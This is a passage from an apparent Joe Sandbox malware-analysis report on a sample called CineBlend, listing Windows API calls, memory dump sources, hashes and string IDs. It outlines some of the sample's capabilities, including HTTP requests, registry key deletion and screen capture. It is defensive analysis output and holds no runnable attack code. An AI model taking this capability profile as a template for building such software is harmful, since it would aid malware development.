                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                          • String ID:
                                          • API String ID: 2178637699-0
                                          • Opcode ID: e4c05b4d418a5f34b38a3504139ee92be054824e91199aecd673c4b9e7c200f5
                                          • Instruction ID: c9207a394f4cd05421797aef0f56cbf5c2850323f1f9c6736c3aae8923fd6b49
                                          • Opcode Fuzzy Hash: e4c05b4d418a5f34b38a3504139ee92be054824e91199aecd673c4b9e7c200f5
                                          • Instruction Fuzzy Hash: A5F17B316042019FCB14EF24C892F6EBBE5EF85310F18899DF4969B2A2DB71DD45CB52
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00BDDCD0), ref: 00BC4B18
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BC4B2A
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00BDDCD0), ref: 00BC4B4F
                                          • FreeLibrary.KERNEL32(00000000,?,00BDDCD0), ref: 00BC4B9B
                                          • StringFromGUID2.OLE32(?,?,00000028,?,00BDDCD0), ref: 00BC4C05
                                          • SysFreeString.OLEAUT32(00000009), ref: 00BC4CBF
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BC4D25
                                          • SysFreeString.OLEAUT32(?), ref: 00BC4D4F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                          • String ID: GetModuleHandleExW$kernel32.dll
                                          • API String ID: 354098117-199464113
                                          • Opcode ID: 15c97f272019f520be30bca19851f0c67e05b1fb762f6541c80ce4ec7adfceca
                                          • Instruction ID: 5af8456b73cba397522acaea1e5cd3e53774c866b113486ad85fc50884830982
                                          • Opcode Fuzzy Hash: 15c97f272019f520be30bca19851f0c67e05b1fb762f6541c80ce4ec7adfceca
                                          • Instruction Fuzzy Hash: 43121871A00115AFDB14DF94C894EAABBF5FF45314F24809CF949AB261DB31EE46CBA0
                                          APIs
                                          • GetMenuItemCount.USER32(00C129C0), ref: 00B83F72
                                          • GetMenuItemCount.USER32(00C129C0), ref: 00B84022
                                          • GetCursorPos.USER32(?), ref: 00B84066
                                          • SetForegroundWindow.USER32(00000000), ref: 00B8406F
                                          • TrackPopupMenuEx.USER32(00C129C0,00000000,?,00000000,00000000,00000000), ref: 00B84082
                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B8408E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                          • String ID: 0
                                          • API String ID: 36266755-4108050209
                                          • Opcode ID: e3b48b6066042aa579836c486425830bdc02aa45407f558d0444c7e51cb13f44
                                          • Instruction ID: 9ebd601aa8efdd26e180d709bf060eb257b3d9d3be92825790b98f7fba786416
                                          • Opcode Fuzzy Hash: e3b48b6066042aa579836c486425830bdc02aa45407f558d0444c7e51cb13f44
                                          • Instruction Fuzzy Hash: 63710930A44205BFEB21AF29DC89FAAFFE5FF05B64F140296F614661E0C7719A50DB90
                                          APIs
                                          • DestroyWindow.USER32(00000000,?), ref: 00BD7823
                                            • Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BD7897
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BD78B9
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BD78CC
                                          • DestroyWindow.USER32(?), ref: 00BD78ED
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B40000,00000000), ref: 00BD791C
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BD7935
                                          • GetDesktopWindow.USER32 ref: 00BD794E
                                          • GetWindowRect.USER32(00000000), ref: 00BD7955
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BD796D
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BD7985
                                            • Part of subcall function 00B42234: GetWindowLongW.USER32(?,000000EB), ref: 00B42242
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 2429346358-3619404913
                                          • Opcode ID: ba92a64a90b6cc5fcce50737c51d7d7659e1e9f12873ec24341a94d93abafa7d
                                          • Instruction ID: 138b537f8ebe9f4d099027c1b8c203ae4c08bd78df60ecf627d139532da7e993
                                          • Opcode Fuzzy Hash: ba92a64a90b6cc5fcce50737c51d7d7659e1e9f12873ec24341a94d93abafa7d
                                          • Instruction Fuzzy Hash: D6718571148241AFD725CF18CC58FAAFBE9FB8A300F04449FF985872A1EB75A906DB11
                                          APIs
                                            • Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0
                                          • DragQueryPoint.SHELL32(?,?), ref: 00BD9BA3
                                            • Part of subcall function 00BD80AE: ClientToScreen.USER32(?,?), ref: 00BD80D4
                                            • Part of subcall function 00BD80AE: GetWindowRect.USER32(?,?), ref: 00BD814A
                                            • Part of subcall function 00BD80AE: PtInRect.USER32(?,?,?), ref: 00BD815A
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00BD9C0C
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BD9C17
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BD9C3A
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BD9C81
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00BD9C9A
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00BD9CB1
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00BD9CD3
                                          • DragFinish.SHELL32(?), ref: 00BD9CDA
                                          • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00BD9DCD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                          • API String ID: 221274066-3440237614
                                          • Opcode ID: 4724dfe292e2d42f589ad12ab7e7ecd8c6d0da2752aedb3887b6a01fe761f231
                                          • Instruction ID: 2148fdc021f80a4a0e5befd3d3098968fdb5a5723827470e25e1b4adc0bf0942
                                          • Opcode Fuzzy Hash: 4724dfe292e2d42f589ad12ab7e7ecd8c6d0da2752aedb3887b6a01fe761f231
                                          • Instruction Fuzzy Hash: D3615971108301AFC701EF64DC85E9FBBE8EF89750F40096EF691932A1EB309A49DB52
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BBCEF5
                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00BBCF08
                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00BBCF1C
                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BBCF35
                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00BBCF78
                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BBCF8E
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BBCF99
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BBCFC9
                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00BBD021
                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00BBD035
                                          • InternetCloseHandle.WININET(00000000), ref: 00BBD040
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                          • String ID:
                                          • API String ID: 3800310941-3916222277
                                          • Opcode ID: 0e8f1a6fd8c6ec5edb8bab81d15ca751abf3c38e70398ee7fbe657280f7f90c0
                                          • Instruction ID: fee1eee6f9181192d6c591ddf3db08180f6b811944c351ecd4d1aab73881a457
                                          • Opcode Fuzzy Hash: 0e8f1a6fd8c6ec5edb8bab81d15ca751abf3c38e70398ee7fbe657280f7f90c0
                                          • Instruction Fuzzy Hash: AA513BB1501608BFDB219F60CC98AFABBFCFF08754F40449AF98597150EB74D949AB60
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00BD66D6,?,?), ref: 00BD8FEE
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00BD66D6,?,?,00000000,?), ref: 00BD8FFE
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00BD66D6,?,?,00000000,?), ref: 00BD9009
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00BD66D6,?,?,00000000,?), ref: 00BD9016
                                          • GlobalLock.KERNEL32(00000000), ref: 00BD9024
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BD66D6,?,?,00000000,?), ref: 00BD9033
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00BD903C
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00BD66D6,?,?,00000000,?), ref: 00BD9043
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BD66D6,?,?,00000000,?), ref: 00BD9054
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BE0C04,?), ref: 00BD906D
                                          • GlobalFree.KERNEL32(00000000), ref: 00BD907D
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00BD909D
                                          • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00BD90CD
                                          • DeleteObject.GDI32(00000000), ref: 00BD90F5
                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BD910B
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                          • String ID:
                                          • API String ID: 3840717409-0
                                          • Opcode ID: 0c73cde0e9de4a1312ef77192a317449c9c41ab54d6b5fd5f4897a8247eeb9e2
                                          • Instruction ID: 19ac48a8cf997d795321980981902af1b161f843c1ed29a8ad530330af9477fb
                                          • Opcode Fuzzy Hash: 0c73cde0e9de4a1312ef77192a317449c9c41ab54d6b5fd5f4897a8247eeb9e2
                                          • Instruction Fuzzy Hash: 29413A75601208BFDB119F65DC88EAABBF8FF89711F10405AF945E7260EB709D41DB60
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                            • Part of subcall function 00BCD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCC10E,?,?), ref: 00BCD415
                                            • Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD451
                                            • Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4C8
                                            • Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4FE
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BCC154
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BCC1D2
                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00BCC26A
                                          • RegCloseKey.ADVAPI32(?), ref: 00BCC2DE
                                          • RegCloseKey.ADVAPI32(?), ref: 00BCC2FC
                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00BCC352
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BCC364
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BCC382
                                          • FreeLibrary.KERNEL32(00000000), ref: 00BCC3E3
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00BCC3F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 146587525-4033151799
                                          • Opcode ID: 79993d1864850a0eed85afdb877c64b4a7e626483216fb4c730d3f46b190244f
                                          • Instruction ID: c9e0765c2d875967d83f13a275eb1be0e9a17f51c8b0a0b96c5133f8ceaca4c8
                                          • Opcode Fuzzy Hash: 79993d1864850a0eed85afdb877c64b4a7e626483216fb4c730d3f46b190244f
                                          • Instruction Fuzzy Hash: 1EC16D35204241AFD710DF24C895F2ABBE1FF94314F1885DDE4AA9B2A2CB71ED46CB91
                                          APIs
                                          • GetDC.USER32(00000000), ref: 00BC3035
                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00BC3045
                                          • CreateCompatibleDC.GDI32(?), ref: 00BC3051
                                          • SelectObject.GDI32(00000000,?), ref: 00BC305E
                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00BC30CA
                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00BC3109
                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00BC312D
                                          • SelectObject.GDI32(?,?), ref: 00BC3135
                                          • DeleteObject.GDI32(?), ref: 00BC313E
                                          • DeleteDC.GDI32(?), ref: 00BC3145
                                          • ReleaseDC.USER32(00000000,?), ref: 00BC3150
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: 5417891ac3e0daebf7c60202dff98fc3648b383149a6b7db1d72be334015415b
                                          • Instruction ID: e101f8ee63817161a4163caa43e0636aa671de87fa4bc439a9ab993454b86490
                                          • Opcode Fuzzy Hash: 5417891ac3e0daebf7c60202dff98fc3648b383149a6b7db1d72be334015415b
                                          • Instruction Fuzzy Hash: 4361D275D01219AFCF04CFA4D884EAEBBF5FF48710F20855AE555A7250E771A941CF90
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 00B7DE21
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7D9D9
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7D9EB
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7D9FD
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA0F
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA21
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA33
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA45
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA57
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA69
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA7B
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA8D
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DA9F
                                            • Part of subcall function 00B7D9BC: _free.LIBCMT ref: 00B7DAB1
                                          • _free.LIBCMT ref: 00B7DE16
                                            • Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
                                            • Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60
                                          • _free.LIBCMT ref: 00B7DE38
                                          • _free.LIBCMT ref: 00B7DE4D
                                          • _free.LIBCMT ref: 00B7DE58
                                          • _free.LIBCMT ref: 00B7DE7A
                                          • _free.LIBCMT ref: 00B7DE8D
                                          • _free.LIBCMT ref: 00B7DE9B
                                          • _free.LIBCMT ref: 00B7DEA6
                                          • _free.LIBCMT ref: 00B7DEDE
                                          • _free.LIBCMT ref: 00B7DEE5
                                          • _free.LIBCMT ref: 00B7DF02
                                          • _free.LIBCMT ref: 00B7DF1A
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: b4d78faaafb1a131bfdea4764649da49e54eb26515eecd07f1db2635143d3bf0
                                          • Instruction ID: 064597052c1039108c76f1f90e6a2991c69fad636319b4a725fbae2b23309f9e
                                          • Opcode Fuzzy Hash: b4d78faaafb1a131bfdea4764649da49e54eb26515eecd07f1db2635143d3bf0
                                          • Instruction Fuzzy Hash: 19311771604605DFEF32AB38D845B5A73F9EF20390F5088E9E46DDB192DB71A880CB20
                                          APIs
                                            • Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0
                                          • GetSystemMetrics.USER32(0000000F), ref: 00BDA990
                                          • GetSystemMetrics.USER32(00000011), ref: 00BDA9A7
                                          • GetSystemMetrics.USER32(00000004), ref: 00BDA9B3
                                          • GetSystemMetrics.USER32(0000000F), ref: 00BDA9C9
                                          • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00BDAC15
                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BDAC33
                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BDAC54
                                          • ShowWindow.USER32(00000003,00000000), ref: 00BDAC73
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00BDAC95
                                          • DefDlgProcW.USER32(?,00000005,?), ref: 00BDACBB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                          • String ID: @
                                          • API String ID: 3962739598-2766056989
                                          • Opcode ID: 9c2d0bb0b7eb5d6ce4f9cfd60815733f6191e61ddb5b2e955aa86ef2b6e74e5a
                                          • Instruction ID: fa513543ff984435a97db95cdaa8e5884d2d44a13b201a60f137872b32328b75
                                          • Opcode Fuzzy Hash: 9c2d0bb0b7eb5d6ce4f9cfd60815733f6191e61ddb5b2e955aa86ef2b6e74e5a
                                          • Instruction Fuzzy Hash: A8B17B31600219EFDF14CF68C9857AEBBF2FF44714F1880AAEC45AB295E774A980CB51
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00BA52E6
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00BA5328
                                          • _wcslen.LIBCMT ref: 00BA5339
                                          • CharUpperBuffW.USER32(?,00000000), ref: 00BA5345
                                          • _wcsstr.LIBVCRUNTIME ref: 00BA537A
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00BA53B2
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00BA53EB
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00BA5445
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00BA5477
                                          • GetWindowRect.USER32(?,?), ref: 00BA54EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                          • String ID: ThumbnailClass
                                          • API String ID: 1311036022-1241985126
                                          • Opcode ID: b9109100867ca9c28b92cd8776b801ffca6cd2f37998deecbe09141dabde0b40
                                          • Instruction ID: 9c0a2c6f83605f19b6a5f41531bbdf7773dc2e41a4a78964f1704a1bf4796466
                                          • Opcode Fuzzy Hash: b9109100867ca9c28b92cd8776b801ffca6cd2f37998deecbe09141dabde0b40
                                          • Instruction Fuzzy Hash: 77911971508B06AFDB28CF24C894FAAB7E9FF56304F004559FA8683190EB31EE55CB91
                                          APIs
                                            • Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0
                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BD97B6
                                          • GetFocus.USER32 ref: 00BD97C6
                                          • GetDlgCtrlID.USER32(00000000), ref: 00BD97D1
                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00BD9879
